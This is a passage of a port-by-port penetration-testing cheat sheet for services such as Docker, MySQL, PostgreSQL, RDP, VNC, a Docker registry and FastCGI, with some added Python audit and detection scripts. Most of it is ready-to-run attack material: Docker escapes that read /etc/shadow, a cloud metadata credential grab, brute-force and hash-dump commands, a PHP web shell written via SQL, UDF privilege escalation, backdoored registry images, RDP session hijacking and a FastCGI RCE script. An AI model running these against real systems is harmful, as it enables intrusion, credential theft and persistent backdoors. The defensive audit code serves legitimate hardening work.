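            findings.setdefault(path, []).extend(issues)
    return findings


if __name__ == "__main__":
    for path, issues in audit_exports(SAMPLE_EXPORTS).items():
        print(path)
        for issue in issues:
            print("  -", issue)
```

Per-client evaluation matters: /data is exported safely to build01 but not to build02, and a whole-line check would miss that.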

NFSShell

Privilege escalation

2375-2376: Docker

Service enumeration

1) Using curl

curl -s http://open.docker.socket:2375/version | jq #Get version

2) Using docker

docker -H open.docker.socket:2375 version #Get version

Exploitation

1) Quick privilege escalation

docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash

2) 2376 - TLS connection

#List containers
curl --insecure https://tlsopen.docker.socket:2376/containers/json | jq

#List processes inside a container
curl --insecure https://tlsopen.docker.socket:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq

#Set up and exec job to hit the metadata URL
curl --insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}'

#Get the output
curl --insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}'

# list secrets (no secrets/swarm not set up)
curl -s --insecure https://tlsopen.docker.socket:2376/secrets | jq

#Check what is mounted
curl --insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}'

#Get the output by starting the exec
curl --insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d '{}'

#Cat the mounted secret
curl --insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}'

#List services (if you have secrets, it's also worth checking services in case they add secrets via environment variables)
curl -s --insecure https://tls-opendocker.socket:2376/services | jq

#Create a container that mounts the host file system and read /etc/shadow
curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}'
curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start?name=test
curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}'
curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d '{}'

#Stop the container
curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stop

#Delete stopped containers
curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune

3) Automation

msf> use exploit/linux/http/docker_daemon_tcp
nmap -sV --script "docker-*" -p <PORT> <IP>

Container escape

docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cat /mnt/etc/shadow

refer:
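Everything in this Docker section rests on two conditions: a daemon API reachable over TCP without TLS client authentication, and permission to start a privileged container with the host root bind-mounted. The following is an added example, not code from the original article: it checks a constructed daemon.json and a constructed excerpt of `docker inspect` output for exactly those conditions. The file contents and finding strings are assumptions; the keys (hosts, tlsverify, HostConfig.Privileged, Binds, NetworkMode, PidMode) are Docker's own.

```python
import json

# Constructed daemon.json (not from the article): API bound to every interface, no TLS.
SAMPLE_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
    "tls": False,
})

# Constructed excerpt of `docker inspect` output for two containers; "escape" is
# configured the way the container-escape command above would create it.
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/web",
        "HostConfig": {"Privileged": False, "Binds": ["web-data:/var/www"],
                       "NetworkMode": "bridge", "PidMode": ""},
    },
    {
        "Name": "/escape",
        "HostConfig": {"Privileged": True, "Binds": ["/:/mnt"],
                       "NetworkMode": "host", "PidMode": "host"},
    },
])

SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/var/run/docker.sock")


def audit_daemon(daemon_json):
    """Return findings for a daemon exposing its API over TCP without client-cert auth.
    'tls' alone encrypts the channel; only 'tlsverify' makes the daemon demand a client certificate."""
    cfg = json.loads(daemon_json)
    issues = []
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue
        if not cfg.get("tlsverify", False):
            issues.append(f"{host}: TCP API without tlsverify; anyone reaching the port controls the daemon as root")
        elif host.startswith(("tcp://0.0.0.0", "tcp://[::]")):
            issues.append(f"{host}: TLS API bound to all interfaces; restrict the listener or firewall it")
    return issues


def audit_containers(inspect_json):
    """Return {name: [findings]} for containers that are privileged, mount sensitive
    host paths, or share host namespaces."""
    findings = {}
    for c in json.loads(inspect_json):
        hc = c.get("HostConfig", {})
        issues = []
        if hc.get("Privileged"):
            issues.append("Privileged: all capabilities and raw device access")
        for bind in hc.get("Binds") or []:
            src = bind.split(":")[0]
            if src in SENSITIVE_HOST_PATHS:
                issues.append(f"host path {src} bind-mounted into the container")
        if hc.get("NetworkMode") == "host":
            issues.append("NetworkMode=host: container shares the host network stack")
        if hc.get("PidMode") == "host":
            issues.append("PidMode=host: container sees and can signal host processes")
        if issues:
            findings[c["Name"].lstrip("/")] = issues
    return findings


if __name__ == "__main__":
    for issue in audit_daemon(SAMPLE_DAEMON_JSON):
        print("daemon:", issue)
    for name, issues in audit_containers(SAMPLE_INSPECT).items():
        print(f"container {name}:", "; ".join(issues))
```

Run `docker inspect $(docker ps -q)` on a host and feed the JSON to audit_containers to find containers that already match the escape pattern, and compare /etc/docker/daemon.json (or the dockerd command line) against audit_daemon before the port ever shows up in a scan.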

3128-Squid

Service fingerprint

PORT     STATE  SERVICE      VERSION
3128/tcp open http-proxy Squid http proxy 4.11

Web proxy

# Try to send curl through the proxy
curl --proxy http://10.10.11.131:3128 http://10.10.11.131

Nmap through the proxy

proxychains.conf file: http 10.10.10.10 3128

proxychains nmap -sT -n -p- localhost

3306-Mysql

Connection

1) Local connection

mysql -u root    # Connect as root without a password
mysql -u root -p # A password will be prompted

2) Remote connection

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

Service enumeration

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands on Windows, Creds

Brute force

# hydra
hydra -L usernames.txt -P pass.txt <IP> mysql

# msfconsole
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false

# medusa
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on the first successful attempt> -t <threads> -M mysql

Command execution

show databases;
use <database>;
show tables;
describe <table_name>;

select grantee, table_schema, privilege_type FROM information_schema.schema_privileges; #Exact privileges
select user,file_priv from mysql.user where user='root'; #File privileges
select version(); #version
select @@version; #version
select user(); #User
select database(); #database name

#Try to execute code
select do_system('id'); #only works if the do_system UDF has already been loaded
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change the MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;

mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

Privilege escalation

1) Current level of access

mysql> select user();
mysql> select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from mysql.user where user='OUTPUT OF select user()';

2) Access passwords

mysql> use mysql
mysql> select user,password from user;

3) Create a new user and grant it privileges

mysql> create user test identified by 'test';
mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

4) Break into a shell

mysql> \! cat /etc/passwd
mysql> \! bash

UDF privilege escalation

# locate lib_mysqludf_sys.so

use mysql;
create table npn(line blob);
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
select * from npn into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
select sys_exec('id > /tmp/out.txt');

Credential extraction

SELECT User,Host,Password FROM mysql.user;
SELECT User,Host,authentication_string FROM mysql.user;

mysql -u root --password=<PASSWORD> -e "SELECT User,Host,authentication_string FROM mysql.user;"

Automation

nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'

refer:
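The load_file, INTO OUTFILE / DUMPFILE and UDF steps in this section all need the FILE privilege together with an unrestricted secure_file_priv, and the privilege-escalation steps start from an account that is reachable remotely and weakly protected. The following is an added example, not code from the original article: it audits constructed `mysql -e` output of mysql.user and SHOW VARIABLES for those preconditions. The sample rows, hash values and finding strings are assumptions; the same approach applies to the pg_shadow, is_superuser and pg_roles queries in the PostgreSQL section.

```python
# Constructed tab-separated output in the shape `mysql -e` produces (not real accounts):
#   mysql -e "SELECT User,Host,authentication_string,File_priv,Super_priv FROM mysql.user"
SAMPLE_USERS = """\
User\tHost\tauthentication_string\tFile_priv\tSuper_priv
root\tlocalhost\t*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B\tY\tY
root\t%\t\tY\tY
app\t%\t*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19\tN\tN
backup\t10.0.0.%\t*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19\tY\tN
"""

# Constructed output of: mysql -e "SHOW VARIABLES WHERE Variable_name IN ('secure_file_priv','plugin_dir')"
# An empty secure_file_priv means file operations are unrestricted; NULL disables them.
SAMPLE_VARIABLES = """\
Variable_name\tValue
secure_file_priv\t
plugin_dir\t/usr/lib/mysql/plugin/
"""


def parse_tsv(text):
    """Turn `mysql -e` tab-separated output (header row first) into a list of dicts."""
    lines = text.splitlines()
    header = lines[0].split("\t")
    return [dict(zip(header, line.split("\t"))) for line in lines[1:] if line]


def audit_mysql_users(users_tsv, variables_tsv):
    """Return {user@host: [findings]} for accounts that can reach the file-read,
    file-write and UDF techniques shown in this section, or that are weakly protected."""
    variables = {r["Variable_name"]: r["Value"] for r in parse_tsv(variables_tsv)}
    sfp = variables.get("secure_file_priv", "")
    findings = {}
    for r in parse_tsv(users_tsv):
        acct = f"{r['User']}@{r['Host']}"
        issues = []
        if r["authentication_string"] == "":
            issues.append("no password set")
        if r["Host"] == "%":
            issues.append("reachable from any host")
        if r["File_priv"] == "Y":
            if sfp == "":
                issues.append("FILE privilege with secure_file_priv empty: LOAD_FILE/OUTFILE/DUMPFILE "
                              "anywhere the server process can write, including plugin_dir")
            elif sfp.upper() == "NULL":
                issues.append("FILE privilege, but secure_file_priv=NULL disables file operations")
            else:
                issues.append(f"FILE privilege confined to {sfp}")
        if r["Super_priv"] == "Y" and r["Host"] != "localhost":
            issues.append("SUPER privilege usable from a non-local host")
        if issues:
            findings[acct] = issues
    return findings


if __name__ == "__main__":
    for acct, issues in audit_mysql_users(SAMPLE_USERS, SAMPLE_VARIABLES).items():
        print(acct)
        for issue in issues:
            print("  -", issue)
```

The UDF step writes the shared object with `into dumpfile` into plugin_dir; with secure_file_priv confined to a directory outside plugin_dir that write fails, which is why the check reports the confining path rather than just FILE_priv on its own.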

3389-RDP

Service fingerprint

PORT     STATE SERVICE
3389/tcp open ms-wbt-server

Login

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp /u:[domain\]<username> /p:<password> /v:<IP>
xfreerdp /u:[domain\]<username> /pth:<hash> /v:<IP>

Brute force

ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>

Service enumeration

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

Session hijacking

1) List the open sessions
query user

2) Attach to the chosen session
tscon <ID> /dest:<SESSIONNAME>

3) Mimikatz
ts::sessions #Get sessions
ts::remote /id:2 #Connect to the session

refer:

3690-svn

Service info

PORT     STATE SERVICE
3690/tcp open svnserve Subversion

Banner grabbing

nc -vn {host} 3690

Service enumeration

svn ls svn://10.10.10.203 #list
svn log svn://10.10.10.203 #Commit history
svn checkout svn://10.10.10.203 #Download the repository
svn up -r 2 #Go to revision 2 inside the checkout folder

5000-Docker Registry

Service enumeration

#List repositories
curl -s http://10.10.10.10:5000/v2/_catalog
{"repositories":["alpine","ubuntu"]}

#Get the tags of a repository
curl -s http://192.251.36.3:5000/v2/ubuntu/tags/list
{"name":"ubuntu","tags":["14.04","12.04","18.04","16.04"]}

#Get manifests
curl -s http://192.251.36.3:5000/v2/ubuntu/manifests/latest

#Download one of the previously listed blobs
curl http://10.10.10.10:5000/v2/ubuntu/blobs/sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935 --output blob1.tar

#Inspect the contents of each blob
tar -xf blob1.tar #After this, inspect the new folders and files created in the current directory

Docker enumeration

#Once you know which images the server stores (/v2/_catalog) you can pull them
docker pull ip:5000/ubuntu

#Check the commands used to create the layers of the image
docker history IP:5000/ubuntu

#Run and get a shell
docker run -it IP:5000/ubuntu bash #Leave this shell running
docker ps #From a different shell
docker exec -it 7d3a81fe42d7 bash #Get a shell inside the running container

Brute force

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/

---

curl -k -u username:password https://ip:5000/v2/_catalog

Web backdoor

1) Create the backdoor: shell.php

<?php echo shell_exec($_GET["cmd"]); ?>

2) Create a Dockerfile

FROM IP:5000/wordpress
COPY shell.php /app/
RUN chmod 777 /app/shell.php

3) Build the image and push it

docker build -t IP:5000/wordpress .
docker images
docker push registry:5000/wordpress

SSH image backdoor

1) If an SSH image is found in the Docker Registry, it can be backdoored

docker pull 10.10.10.10:5000/sshd-docker-cli
docker run -d 10.10.10.10:5000/sshd-docker-cli

2) Extract sshd_config from the SSH image

docker cp 4c989242c714:/etc/ssh/sshd_config .

Change it to: PermitRootLogin yes

3) Create a Dockerfile

FROM 10.10.10.10:5000/sshd-docker-cli
COPY sshd_config /etc/ssh/
RUN echo root:password | chpasswd

4) Build the image and push it

docker build -t 10.10.10.10:5000/sshd-docker-cli .
docker images
docker push registry:5000/sshd-docker-cli #Push it

refer:
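Both backdoor recipes above rely on the registry accepting a rebuilt image pushed under the same tag, so that the next pull of that tag receives the attacker's layers. Registry content is addressed by SHA-256 digest, which is why pulling by digest (`image@sha256:...`) instead of by tag fails closed when a tag has been replaced, and why each layer blob can be checked against the digest the manifest lists for it. The following is an added example, not code from the original article: it verifies a fetched manifest against a pinned digest and every layer blob against the manifest. The layers and manifests are constructed byte strings, not real image layers, and the helper names are this example's own.

```python
import hashlib
import json


def sha256_digest(data: bytes) -> str:
    """Registry digests are 'sha256:' followed by the hex SHA-256 of the exact bytes."""
    return "sha256:" + hashlib.sha256(data).hexdigest()


# Constructed stand-ins for image layers (real layers are gzipped tar archives).
LAYER_BASE = b"tar: /etc/nginx/nginx.conf ... (constructed base layer bytes)"
LAYER_APP = b"tar: /app/index.php ... (constructed application layer bytes)"
LAYER_TAMPERED = b"tar: /app/index.php /app/extra.php ... (constructed tampered layer bytes)"


def make_manifest(layers):
    """Build a schema-2 style manifest listing each layer's size and digest.
    sort_keys gives stable bytes, so the manifest digest is reproducible."""
    return json.dumps({
        "schemaVersion": 2,
        "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
        "layers": [{"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
                    "size": len(b), "digest": sha256_digest(b)} for b in layers],
    }, sort_keys=True)


# The manifest the publisher built, and the one a replaced tag would serve instead.
PINNED_MANIFEST = make_manifest([LAYER_BASE, LAYER_APP])
TAMPERED_MANIFEST = make_manifest([LAYER_BASE, LAYER_TAMPERED])


def pinned_manifest_digest():
    """The value to pin as image@sha256:...; a rebuilt image has a different one."""
    return sha256_digest(PINNED_MANIFEST.encode())


def verify_layers(manifest_json, blobs):
    """Check every layer in the manifest against the blob fetched for it.
    `blobs` maps digest -> bytes, as returned by /v2/<name>/blobs/<digest>."""
    problems = []
    for layer in json.loads(manifest_json)["layers"]:
        data = blobs.get(layer["digest"])
        if data is None:
            problems.append(f"{layer['digest']}: blob missing")
            continue
        if len(data) != layer["size"]:
            problems.append(f"{layer['digest']}: size {len(data)} != {layer['size']}")
        actual = sha256_digest(data)
        if actual != layer["digest"]:
            problems.append(f"{layer['digest']}: content hashes to {actual}")
    return (not problems), problems


def verify_pull(manifest_bytes, blobs, pinned_digest):
    """Accept a pull only if the manifest matches the pin and every layer matches the manifest."""
    actual = sha256_digest(manifest_bytes)
    if actual != pinned_digest:
        # A replaced tag yields a self-consistent but different manifest; refuse before touching layers.
        return False, [f"manifest digest {actual} does not match pin {pinned_digest}"]
    return verify_layers(manifest_bytes.decode(), blobs)


if __name__ == "__main__":
    pin = pinned_manifest_digest()
    good = {sha256_digest(LAYER_BASE): LAYER_BASE, sha256_digest(LAYER_APP): LAYER_APP}
    print("genuine image:", verify_pull(PINNED_MANIFEST.encode(), good, pin))
    swapped = {sha256_digest(LAYER_BASE): LAYER_BASE, sha256_digest(LAYER_TAMPERED): LAYER_TAMPERED}
    print("replaced tag:", verify_pull(TAMPERED_MANIFEST.encode(), swapped, pin))
```

The two failure modes are distinct: a replaced tag is caught by the manifest pin alone, while a blob that differs from what the pinned manifest lists is caught by the per-layer check. Neither check helps if the pinned digest itself was taken from the registry after the push, so record digests at build time.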

5432-5433: Postgresql

Service fingerprint

PORT     STATE SERVICE
5432/tcp open pgsql

Connection commands

psql -U <myuser>   # Open the psql console as a user
psql -h <host> -U <username> -d <database> # Remote connection
psql -h <host> -p <port> -U <username> -W <database> # Remote connection; -W forces a password prompt

---

psql -h localhost -d <database_name> -U <User> #The password will be prompted
\list # List databases
\c <database> # Use the database
\d # List tables
\du+ # Get user roles

#Read a file
CREATE TABLE demo(t text);
COPY demo from '[FILENAME]';
SELECT * FROM demo;

#Write ascii to a file (COPY TO cannot copy binary data)
COPY (select convert_from(decode('<B64 payload>','base64'),'utf-8')) to 'C:\\some\\interesting\\path.cmd';

#List databases
SELECT datname FROM pg_database;

#Read credentials (usernames + password hashes)
SELECT usename, passwd from pg_shadow;

#Check if the current user is a superuser
SELECT current_setting('is_superuser'); #If the response is "on" then true, if "off" then false

#Check if plpgsql is enabled
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';

#Change password
ALTER USER user_name WITH PASSWORD 'new_password';

#Check user privileges over a table (pg_shadow in this example)
SELECT grantee, privilege_type
FROM information_schema.role_table_grants
WHERE table_name='pg_shadow';

#Get user roles
SELECT
r.rolname,
r.rolsuper,
r.rolinherit,
r.rolcreaterole,
r.rolcreatedb,
r.rolcanlogin,
r.rolconnlimit, r.rolvaliduntil,
ARRAY(SELECT b.rolname
FROM pg_catalog.pg_auth_members m
JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)
WHERE m.member = r.oid) as memberof
, r.rolreplication
FROM pg_catalog.pg_roles r
ORDER BY 1;

Service enumeration

msf> use auxiliary/scanner/postgres/postgres_version
msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection

Brute force

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M postgres
ncrack -v -U /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
msf> use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>

Exploitation

msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> use auxiliary/admin/postgres/postgres_readfile
msf> use exploit/linux/postgres/postgres_payload
msf> use exploit/windows/postgres/postgres_payload

refer:

5800/5801/5900/5901-VNC

Service enumeration

nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p <PORT> <IP>
msf> use auxiliary/scanner/vnc/vnc_none_auth

Brute force

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> -u root -P /root/Desktop/pass.txt -M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:<PORT>
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries 0 -x quit:code=0
nmap -sV --script vnc-brute --script-args passdb=/var/passwords.txt -p <PORT> <IP>

#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst

VNC connection

vncviewer [-passwd passwd.txt] <IP>::5901

VNC password decryption

Default password file location: ~/.vnc/passwd

# Decrypt with: https://github.com/jeroennijhof/vncpwd

make
vncpwd <vnc password file>

refer:

5984/6984-CouchDB

Automated enumeration

nmap -sV --script couchdb-databases,couchdb-stats -p <PORT> <IP>
msf> use auxiliary/scanner/couchdb/couchdb_enum

Manual enumeration

1) Banner grab
curl http://IP:5984/

2) Database list
curl -X GET http://IP:5984/_all_dbs
curl -X GET http://user:password@IP:5984/_all_dbs

3) Database info
curl http://IP:5984/<database>
curl http://localhost:5984/simpsons

4) Document list
curl -X GET http://IP:5984/{dbname}/_all_docs
curl http://localhost:5984/simpsons/_all_docs

5) Read a document
curl -X GET http://IP:5984/{dbname}/{id}
curl http://localhost:5984/simpsons/f0042ac3dc4951b51f056467a1000dd9

Brute force

msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /

refer:

8009-AJP

Service fingerprint

PORT     STATE SERVICE
8009/tcp open  ajp13

Service enumeration

nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 <IP>

Brute force

nmap --script ajp-brute -p 8009 <IP>

8086-InfluxDB

Authentication enumeration

1) No authentication
influx -host 'host name' -port 'port #'
> use _internal

2) With authentication
influx -username influx -password influx_pass

3) Automated enumeration
msf6 > use auxiliary/scanner/http/influxdb_enum

Common commands

> show databases

> show measurements #show the tables

> show field keys #show the field keys (columns)

> select * from cpu #dump the table

9000-FastCGI

RCE

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/public/index.php" # Existing file path on the target

HOST=$1
B64=$(echo "$PAYLOAD" | base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    # php-fpm honours PHP_VALUE per request; auto_prepend_file loads the payload from a data:// URI
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME="$FN" SCRIPT_NAME="$FN" REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect "$HOST:9000" &> "$OUTPUT"

    cat "$OUTPUT"
done
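On the wire, what the script above sends is an FCGI_PARAMS record carrying PHP_VALUE to php-fpm, which trusts whoever can reach port 9000. The defensive question is therefore whether anything other than the web server can reach that listener, and whether such parameters ever arrive from the network. The Python below is an added example, not part of the original page or of cgi-fcgi: it constructs a FastCGI request of the same shape (with a placeholder where the payload would be), parses the records back and flags PHP_VALUE / PHP_ADMIN_VALUE. Run over a capture from the php-fpm listener it separates ordinary web-server traffic, which does not set those parameters unless your nginx or Apache config does so explicitly, from an injection attempt.

```python
import struct

# FastCGI record types (from the FastCGI specification)
FCGI_BEGIN_REQUEST = 1
FCGI_PARAMS = 4
FCGI_STDIN = 5

# php-fpm parameters that change interpreter configuration per request.
# Seeing them arrive from an untrusted client is the signature of the attack above.
SUSPICIOUS_PARAMS = {"PHP_VALUE", "PHP_ADMIN_VALUE"}


def _encode_length(n):
    """Name/value length: 1 byte if < 128, else 4 bytes with the high bit set."""
    if n < 128:
        return bytes([n])
    return struct.pack(">I", n | 0x80000000)


def encode_params(params):
    """Encode a dict of name/value pairs as FCGI_PARAMS content bytes."""
    out = b""
    for name, value in params.items():
        n, v = name.encode(), value.encode()
        out += _encode_length(len(n)) + _encode_length(len(v)) + n + v
    return out


def build_record(rtype, request_id, content):
    """Wrap content in a FastCGI record header (version 1, no padding)."""
    return struct.pack(">BBHHBB", 1, rtype, request_id, len(content), 0, 0) + content


def iter_records(data):
    """Yield (type, request_id, content) for each record in a byte string."""
    pos = 0
    while pos + 8 <= len(data):
        version, rtype, req_id, clen, plen, _ = struct.unpack(">BBHHBB", data[pos:pos + 8])
        if version != 1:
            raise ValueError("unsupported FastCGI version %d" % version)
        start = pos + 8
        yield rtype, req_id, data[start:start + clen]
        pos = start + clen + plen


def _decode_length(buf, pos):
    if buf[pos] < 128:
        return buf[pos], pos + 1
    (n,) = struct.unpack(">I", buf[pos:pos + 4])
    return n & 0x7FFFFFFF, pos + 4


def decode_params(content):
    """Decode FCGI_PARAMS content into a dict (an empty record ends the stream)."""
    params, pos = {}, 0
    while pos < len(content):
        nlen, pos = _decode_length(content, pos)
        vlen, pos = _decode_length(content, pos)
        name = content[pos:pos + nlen].decode(errors="replace")
        value = content[pos + nlen:pos + nlen + vlen].decode(errors="replace")
        params[name] = value
        pos += nlen + vlen
    return params


def find_config_injection(data):
    """Return one finding per PHP_VALUE / PHP_ADMIN_VALUE parameter seen in the byte stream."""
    findings = []
    for rtype, req_id, content in iter_records(data):
        if rtype != FCGI_PARAMS or not content:
            continue
        params = decode_params(content)
        for name in sorted(SUSPICIOUS_PARAMS & set(params)):
            findings.append({"request_id": req_id, "param": name, "value": params[name],
                             "script": params.get("SCRIPT_FILENAME", "?")})
    return findings


# Constructed sample: a request with the same shape as the script above would produce,
# with "..." standing in for the base64 payload.
SAMPLE_REQUEST = (
    build_record(FCGI_BEGIN_REQUEST, 1, struct.pack(">HB5x", 1, 0))  # role=RESPONDER, flags=0
    + build_record(FCGI_PARAMS, 1, encode_params({
        "SCRIPT_FILENAME": "/var/www/public/index.php",
        "REQUEST_METHOD": "POST",
        "PHP_VALUE": "allow_url_include=1\nauto_prepend_file='data://text/plain;base64,...'",
    }))
    + build_record(FCGI_PARAMS, 1, b"")  # empty record terminates the params stream
    + build_record(FCGI_STDIN, 1, b"")
)

if __name__ == "__main__":
    for f in find_config_injection(SAMPLE_REQUEST):
        print("request %(request_id)d sets %(param)s for %(script)s: %(value)r" % f)
```

The durable fix is not to expose the listener at all: have the pool listen on a unix socket, or set listen.allowed_clients = 127.0.0.1 in the php-fpm pool configuration, so a stray port 9000 is never reachable from the network.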

refer:

9200/9300: Elasticsearch

Authentication check

curl -X GET "ELASTICSEARCH-SERVER:9200/_xpack/security/user"  #no authentication

curl -X GET http://user:password@IP:9200/ #with authentication

Brute force

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /

User enumeration

#List all roles on the system:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/role"

#List all users on the system:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user"

#Get more information about the rights of a user:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/<USERNAME>"

msf > use auxiliary/scanner/elasticsearch/indices_enum

refer:

